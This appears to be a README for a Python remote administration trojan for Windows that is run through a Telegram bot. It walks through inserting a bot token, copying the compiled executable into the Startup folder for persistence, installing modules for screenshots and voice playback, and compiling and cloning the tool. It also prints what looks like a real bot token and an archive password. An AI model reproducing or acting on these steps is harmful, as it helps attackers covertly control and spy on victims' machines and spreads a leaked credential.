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A New Microsoft Windows Remote Administrator Tool [RAT] with Python by Sir.4m1R.

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Microsoft Windows Remote Administrator Tool

Language: Python
Coder: Sir.4m1R
Developer: Ahoora Mansouri

Powered By The404Hacking
Digital Security ReSearch Group

Robot for initial Windows-Python-RAT testing

Bot ID: @W_P_RAT_Bot

Token: 586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY

Set Bot API-Token

To replace your robot Token in RAT, simply go to Line 35 in the file and place your API-TOKEN instead of TOKEN.

In Line 35:

#Replace Your Bot API-TOKEN
update = Updater("TOKEN")

Example for Replace Token:

Replace Token

StartUP Setting

For startup setting, you must first write the name of your bot before compiling it in the file. For example, before compiling the RAT file, you need to go to line 281 and name it as an YOUR-COMPILED-RAT-NAME.exe.

In Line 281:

os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"')
#replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'

Video Tutorial Setting Up a Startup on a RAT: Watch

StartUP Setting


Windows-Python-RAT requires Python version 2.7.x

Download Python Version 2.7.13: Click Here

Download Python

Python 2.7.14 - 2017-09-16

Download for Windows (.msi)

Install Python

Learning Install Python on Microsoft Windows: Click Here

Module in Python

To use the Windows-Python-RAT, you need to install the following modules in your python.

For automatic installation, you can first open the (python file and select the [1] Install Module option.

To install the modules manually, simply enter the commands for installing each module in your CMD or Terminal.

Module List:

  • Upgrade pip

python -m pip install --upgrade pip

  • Python Telegram Bot (Telegram API for Python)

python -m pip install python-telegram-bot

  • Pyttsx (for Play Voice)

python -m pip install pyttsx

  • PyInstaller (for Compile py file)

python -m pip install pyinstaller

  • Autopy (for Take Screenshot)

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking

AutoPy Module in Python

learning Install AutoPy Module on Python 2: Watch

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking

Clone and Run Setup

  • Linux:
git clone ‎/~
cd Windows-Python-RAT
  • Windows:
Download from ‎/~
Extract files.
cd Windows-Python-RAT


Windows-Python-RAT Logo

Setup ScreenShot:

Setup ScreenShot

RAT Control Panel @W_P_RAT_Bot:

RAT Control Panel ScreenShot1

RAT Control Panel ScreenShot2

Download and Clone

Download: Click Here

Clone: git clone /~

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